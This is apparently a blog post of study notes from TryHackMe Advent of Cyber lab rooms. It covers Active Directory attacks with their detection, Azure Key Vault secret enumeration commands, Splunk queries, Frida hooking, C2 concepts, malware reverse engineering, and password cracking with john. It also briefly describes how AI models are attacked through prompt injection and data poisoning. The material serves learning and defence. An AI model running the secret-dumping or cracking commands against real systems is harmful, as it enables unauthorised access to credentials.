Active Directory (AD) is a Directory Service at the heart of most enterprise networks that stores information about objects in a network. The associated objects can include:

  • Users: Individual accounts representing people or services
  • Groups: Collections of users or other objects, often with specific permissions
  • Computers: Machines that belong to the domain governed by AD policies
  • Printers and other resources: Network-accessible devices or services

The building blocks of an AD architecture include:

  • Domains: Logical groupings of network resources such as users, computers, and services. They serve as the main boundary for AD administration and can be identified by their Domain Component and Domain Controller name. Everything inside a domain is subject to the same security policies and permissions.
  • Organisational Units (OUs): OUs are containers within a domain that help group objects based on departments, locations or functions for easier management. Administrators can apply Group Policy settings to specific OUs, allowing more granular control of security settings or access permissions.
  • Forest: A collection of one or more domains that share a standard schema, configuration, and global catalogue. The forest is the top-level container in AD.
  • Trust Relationships: Domains within a forest (and across forests) can establish trust relationships that allow users in one domain to access resources in another, subject to permission.

Combining all these components allows us to establish the Distinguished Name (DN) that an object belongs to within the AD.

Group Policy

One of Active Directory’s most powerful features is Group Policy, which allows administrators to enforce policies across the domain. Group Policies can be applied to users and computers to enforce password policies, software deployment, firewall settings, and more. Group Policy Objects (GPOs) are the containers that hold these policies. A GPO can be linked to the entire domain, an OU, or a site, giving the flexibility in applying policies.

Common Active Directory Attacks

Golden Ticket Attack

A Golden Ticket attack allows attackers to exploit the Kerberos protocol and impersonate any account on the AD by forging a Ticket Granting Ticket (TGT). By compromising the krbtgt account and using its password hash, the attackers gain complete control over the domain for as long as the forged ticket remains valid. The attack requires four critical pieces of information to be successful:

  • Fully Qualified Domain Name (FQDN) of the domain
  • SID of the domain
  • Username of an account to impersonate
  • KRBTGT account password hash

Detection for this type of attack involves monitoring for unusual activity involving the krbtgt

  • Event ID 4768: Look for TGT requests for high-privilege accounts.
  • Event ID 4672: This logs when special privileges (such as SeTcbPrivilege) are assigned to a user.

Pass-the-Hash

This type of attack steals the hash of a password and can be used to authenticate to services without needing the actual password. This is possible because the NTLM protocol allows authentication based on password hashes.

Key ways to mitigate this attack are enforcing strong password policies, conducting regular audits on account privileges, and implementing multi-factor authentication across the domain.

Kerberoasting

Kerberoasting is an attack targeting Kerberos in which the attacker requests service tickets for accounts with Service Principal Names (SPNs), extracts the tickets and password hashes, and then attempts to crack them offline to retrieve the plaintext password.

Mitigation for this type of attack involves ensuring that service accounts are secured with strong passwords, and therefore, implementing secure policies across the AD would be the defence.

Pass-the-Ticket

In a Pass-the-Ticket attack, attackers steal Kerberos tickets from a compromised machine and use them to authenticate as the user or service whose ticket was stolen.

This attack can be detected through monitoring for suspicious logins using Event ID 4768 (TGT request), especially if a user is logging in from unusual locations or devices. Additionally, Event ID 4624 (successful login) will reveal tickets being used for authentication.

Malicious GPOs

Adversaries are known to abuse Group Policy to create persistent, privileged access accounts and distribute and execute malware by setting up policies that mimic software deployment across entire domains. With escalated privileges across the domain, attackers can create GPOs to accomplish goals at scale, including disabling core security software and features such as firewalls, antivirus, security updates, and logging. Additionally, scheduled tasks can be created to execute malicious scripts or exfiltration data from affected devices across the domain.

To mitigate against the exploitation of Group Policy, GPOs need to be regularly audited for unauthorised changes. Strict permissions and procedures for GPO modifications should also be enforced.

Skeleton Key Attack

In a Skeleton Key attack, attackers install a malware backdoor to log into any account using a master password. The legitimate password for each account would remain unchanged, but attackers can bypass it using the skeleton key password.

User Auditing

User accounts are a valuable and often successful method of attack. You can use Event Viewer IDs to review user events and PowerShell to audit their status. Attack methods such as password spraying will eventually result in user accounts being locked out, depending on the domain controller’s lockout policy.

To view all locked accounts, you can use the Search-ADAccount cmdlet, applying some filters to show information such as the last time the user had successfully logged in.

Search-ADAccount -LockedOut | Select-Object Name, SamAccountName, LockedOut, LastLogonDate, DistinguishedName

To quickly review the user accounts present on a domain, as well as their group membership, is by using the Get-ADUser cmdlet Get-ADUser -Filter * -Properties MemberOf | Select-Object Name, SamAccountName, @{Name=”Groups”;Expression={$_.MemberOf}}

Reviewing PowerShell History and Logs

On a Windows Server, this history file is located at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.

Additionally, logs are recorded for every PowerShell process executed on a system. These logs are located within the Event Viewer under Application and Services Logs -> Microsoft -> Windows -> PowerShell -> Operational or also under Application and Service Logs -> Windows PowerShell. The logs have a wealth of information useful for incident response.

These are useful when auditing the Active directory.

DAY 16

Azure is a CSP (Cloud Service Provider), and CSPs (others include Google Cloud and AWS) provide computing resources such as computing power on demand in a highly scalable fashion.

Azure Key Vault

Azure Key Vault is an Azure service that allows users to securely store and access secrets. These secrets can be anything from API Keys, certificates, passwords, cryptographic keys, and more. Essentially, anything you want to keep safe, away from the eyes of others, and easily configure and restrict access to is what you want to store in an Azure Key Vault. The secrets are stored in vaults, which are created by vault owners. Vault owners have full access and control over the vault, including the ability to enable auditing so a record is kept of who accessed what secrets and grant permissions for other users to access the vault (known as vault consumers).

Microsoft Entra ID

Microsoft Entra ID (formerly known as Azure Active Directory) is Azure’s solution. Entra ID is an identity and access management (IAM) service. In short, it has the information needed to assess whether a user/application can access X resource.

Entra ID Enumeration

Listing all the users in the tenant. az ad user list

Listing all the groups in the tenant. az ad group list

Viewing members of the group az ad group member list — group “Group name”

Source : Tryhackme

Azure Role Assignments define the resources that each user or group can access. When a new user is created via Entra ID, it cannot access any resource by default due to a lack of role. To grant access, an administrator must assign a role to let users view or manage a specific resource. The privilege level configured in a role ranges from read-only to full-control. Additionally, group members can inherit a role when assigned to a group.

Returning to the Azure enumeration, let’s see if a role is assigned to the Secret Recovery Group. We will be using the --all option to list all roles within the Azure subscription, and we will be using the --assignee option with the group's ID to render only the ones related to our target group.

az role assignment list — assignee REPLACE_WITH_SECRET_RECOVERY_GROUP_ID — all

Azure Key Vault

az keyvault list
az keyvault secret list --vault-name name_of_vault
az keyvault secret show --vault-name name_of_vault --name actual_secret_name

DAY 17

Splunk is a powerful platform for collecting, analyzing, and visualizing machine-generated data (like logs). It helps organizations monitor systems, troubleshoot issues, detect security threats, and make data-driven decisions.Splunk uses SPL (Search Processing Language) for searching, analyzing, and visualizing data.

index=webserver status_code=500 | stats count by host
index=webserver: Searches logs in the "webserver" index.
status_code=500: Filters logs where the status code is 500 (error).
stats count by host: Aggregates and counts errors per host.

Common Categories of SPL Commands

  1. Filtering: fields, where, search.
  2. Statistics: stats, eventstats, timechart.
  3. Data Transformation: eval, rex, transaction.
  4. Visualization: chart, table, top.

Search: Query logs by keywords or terms.
index=<index_name> keyword
Fields: Select specific fields to display.
index=webserver | fields user, status_code
Where: Filter results based on conditions.
index=webserver | where status_code=200
Stats: Generate statistics (sum, count, average, etc.)
index=webserver | stats count by status_code

Timechart: Create time-based visualizations.
index=webserver | timechart count by status_code
Dedup: Remove duplicate events based on a field.
index=webserver | dedup user
Sort: Sort results by a field.
index=webserver | sort -time
Eval: Create or modify fields.
index=webserver | eval response_time=duration/1000
Rex: Extract fields using regular expressions.
index=webserver | rex field=_raw “user=(?<username>\w+)”
Transaction: Correlate related events into a single transaction.
index=webserver | transaction session_id
Table: Display results in a table format.
index=webserver | table user, status_code, response_time
Chart: Create charts for data aggregation.
index=webserver | chart count by status_code
Top: Display the most common values of a field.
index=webserver | top user
Eventstats: Add aggregated data to each event.
index=webserver | eventstats avg(response_time) as avg_time

DAY 18

Exploiting the AI

  • Data Poisoning: As we discussed, an AI model is as good as the data it is trained on. Therefore, if some malicious actor introduces inaccurate or misleading data into the training data of an AI model while the AI is being trained or when it is being fine-tuned, it can lead to inaccurate results.
  • Sensitive Data Disclosure: If not properly sanitised, AI models can often provide output containing sensitive information such as proprietary information, personally identifiable information (PII), Intellectual property, etc. For example, if a clever prompt is input to an AI chatbot, it may disclose its backend workings or the confidential data it has been trained on.
  • Prompt Injection: Prompt injection is one of the most commonly used attacks against LLMs and AI chatbots. In this attack, a crafted input is provided to the LLM that overrides its original instructions to get output that is not intended initially, similar to control flow hijack attacks against traditional systems.

DAY 19

Hacking with Frida

Frida is a powerful instrumentation tool that allows us to analyze, modify, and interact with running applications. Frida creates a thread in the target process; that thread will execute some bootstrap code that allows the interaction. This interaction, known as the agent, permits the injection of JavaScript code, controlling the application’s behaviour in real-time. One of the most crucial functionalities of Frida is the Interceptor. This functionality lets us alter internal functions’ input or output or observe their behaviour.

frida-tracecreates handlers for each library function used by the game. By editing the handler files, we can tell Frida what to do with the intercepted values of a function call. To have Frida create the handler files, you would run the following command: frida-trace ./main -i ‘*’

Frida command to intercept all the functions in the libaocgame.so library where some of the game logic is present: frida-trace ./TryUnlockMe -i 'libaocgame.so!*'

DAY 20

A beacon refers to a signal or communication sent from a compromised system back to an attacker-controlled infrastructure. It is commonly used in cyberattacks, especially in advanced persistent threats (APTs) and post-exploitation phases, to maintain control over the target environment. A C2 (Command and Control) server is the infrastructure used by attackers to maintain communication with compromised systems in a network. It acts as the central hub for directing malicious activities on infected systems.

Examples of Beaconing and C2 Tools

Beaconing Tools:

  • Cobalt Strike (Red Team Tool)
  • Metasploit

C2 Frameworks:

  • Empire
  • Pupy
  • Sliver

DAY 21

This is one of the interesting rooms from Marcus Hutchins who reverse-engineered the WannaCry ransomware application and discovered a specific function within the application where the malware wouldn’t run if a particular domain were registered and available.Marcus then registered this domain, stopping the global WannaCry attack. This is just one of many famous cases of reverse engineering being used in cyber security defence.

Reverse Engineering (RE) is the process of breaking something down to understand its function. In cyber security, reverse engineering is used to analyse how applications (binaries) function. This can be used to determine whether or not the application is malicious or if there are any security bugs present.

Binaries have a specific structure depending on the operating system they are designed to run. For example, Windows binaries follow the Portable Executable (PE) structure, whereas on Linux, binaries follow the Executable and Linkable Format (ELF). This is why, for example, you cannot run a .exe file on MacOS.

  • A code section: This section contains the instructions that the CPU will execute
  • A data section: This section contains information such as variables, resources (images, other data), etc
  • Import/Export tables: These tables reference additional libraries used (imported) or exported by the binary. Binaries often rely on libraries to perform functions. For example, interacting with the Windows API to manipulate files

Disassembling a binary shows the low-level machine instructions the binary will perform (you may know this as assembly). Because the output is translated machine instructions, you can see a detailed view of how the binary will interact with the system at what stage. Tools such as IDA, Ghidra, and GDB can do this.

Decompiling, however, converts the binary into its high-level code, such as C++, C#, etc., making it easier to read. However, this translation can often lose information such as variable names. This method of reverse engineering a binary is useful if you want to get a high-level understanding of the application’s flow.

Multi-Stage Binaries

  1. Stage 1 — Dropper: This binary is usually a lightweight, basic binary responsible for actions such as enumerating the operating system to see if the payload will work. Once certain conditions are verified, the binary will download the second — much more malicious — binary from the attacker’s infrastructure.
  2. Stage 2 — Payload: This binary is the “meat and bones” of the attack. For example, in the event of ransomware, this payload will encrypt and exfiltrate the data.

Reverse engineering .NET binaries using the decompiler ILSpy. Since it’s a Windows file, use PEStudio, a software designed to investigate potentially malicious files and extract information from them without execution. This will help us focus on the static analysis side of the investigation.

Another essential section we can use to obtain information about the binary is the “indicators” section. This section tells us about the potential indicators like URLs or other suspicious attributes of a binary.

DAY 22

Kubernetes is a powerful tool designed to manage and organize containers, which are small, lightweight units used to run applications. It’s like a traffic controller for applications running in containers, ensuring they work efficiently, scale when needed, and remain available.

Why Was Kubernetes Created?

In the past, companies built their applications using a monolithic architecture — everything in a single unit. While this worked well for some, it posed challenges, especially for scaling. For example:

  • If one part of the application needed more resources, the entire application had to scale up, which was inefficient.

To solve this, many companies started breaking down their applications into microservices.

  • Each microservice handles a specific function (e.g., user registration, billing, or streaming).
  • They can be scaled independently based on demand.

To host these microservices, companies turned to containers because they are lightweight and portable. However, managing hundreds or thousands of containers manually became overwhelming. That’s where Kubernetes comes in.

Kubernetes is a container orchestration system. It automates the management of containers to ensure applications run smoothly.

Key Features of Kubernetes:

  1. Scaling:
  • If a microservice (e.g., video streaming) experiences a surge in traffic, Kubernetes automatically creates more containers to handle the load.
  • Once demand decreases, it removes the extra containers to save resources.

2. Load Balancing:

  • Kubernetes evenly distributes incoming traffic across multiple containers, ensuring no single container is overwhelmed

3. High Availability:

  • If a container fails, Kubernetes replaces it with a new one, keeping the application running.

4. Portability:

  • Kubernetes works across different platforms and tech stacks, making it widely adopted in the industry.

Kubernetes Structure

  • Pods: The smallest unit in Kubernetes. Each pod runs one or more containers.
  • Nodes: Physical or virtual machines where the pods run.
  • Cluster: A group of nodes managed by Kubernetes.

In a cluster, Kubernetes ensures all pods and nodes work together efficiently.

minikube start  start K8s using the following command
kubectl get pods -n wareville verify that the cluster is up and running using the following command
kubectl exec -n wareville naughty-or-nice -it -- /bin/bash Connect to the pod using the following command
docker ps To view the registry container ID, run the following command
docker exec CONTAINER NAME / ID ls -al /var/log
docker logs CONTAINER NAME / ID
cat docker-registry-logs.log | grep "HEAD" | cut -d ' ' -f 1
kubectl get rolebindings -n wareville
kubectl describe rolebinding mayor-user-binding -n wareville
kubectl describe role mayor-user -n wareville

Using the same password for pulling (downloading) and pushing (uploading) content in a system like a Docker registry can be risky. If someone gains access to these credentials, they could upload harmful files or programs that might be deployed and run in the system, causing security issues. To prevent this, it’s a good practice to use separate passwords for pulling and pushing, limiting what an attacker can do if the credentials are leaked.

DAY 23

hashID is a tool written in Python 3 which supports the identification of over 220 unique hash types using regular expressions.It is able to identify a single hash, parse a file or read multiple files in a directory and identify the hashes within them. hashID is also capable of including the corresponding hashcat mode and/or JohnTheRipper format in its output.

First need to find what is the hash using HASH-ID and crack the hash using john or hashcat

john --format=raw-sha256 --rules=wordlist --wordlist=/usr/share/wordlists/rockyou.txt hash1.txt

ls /opt/john/*2john*
pdf2john.pl private.pdf > pdf.hash
john --rules=single --wordlist=wordlist.txt pdf.hash
pdftotext private.pdf -upw PASSWORD

DAY 24

MQTT (Message Queuing Telemetry Transport) is a lightweight messaging protocol widely used in IoT (Internet of Things) devices. It allows devices like sensors and controllers to communicate efficiently by publishing and subscribing to messages through a central broker. While it is convenient, its improper configuration or lack of security can make it a target for attackers in IoT environments.

Key Components of MQTT

  1. MQTT Clients:

IoT devices like sensors or controllers that use MQTT to send or receive messages.

Example:

  • A temperature sensor publishes temperature data.
  • An HVAC controller subscribes to that data and adjusts the system accordingly.

2. MQTT Broker:

Acts as the middleman. It receives messages from publishing clients and distributes them to subscribing clients based on topics.

Example:

  • The broker ensures a message from the temperature sensor reaches the HVAC controller.

3. MQTT Topics:

Topics organize messages so devices only receive relevant data.

Example:

  • The topic "room temperature" is used for temperature-related data.
  • An HVAC controller subscribes to this topic but ignores unrelated topics like "light readings".
mosquitto_pub -h localhost -t "some_topic" -m "message"
  • mosquitto_pub: A command-line tool to send (publish) MQTT messages.
  • -h localhost: Specifies the MQTT broker address, here running locally (on the same machine).
  • -t "some_topic": Indicates the topic under which the message is sent.
  • -m "message": The actual message being published, such as "on" or "off".

Thanks For Reading :)

Don’t miss out on my upcoming articles! Follow me on Medium for more insightful content. Clap and share this article to spread the knowledge among fellow cybersecurity enthusiasts.

If you have any further questions or would like to connect, feel free to reach out to me.

My LinkedIn handle: https://www.linkedin.com/in/kishoreram-k/

--

--

KISHORERAM
KISHORERAM

Written by KISHORERAM

Cybersecurity & Networking enthusiast | Avid learner| Looking for opportunities

No responses yet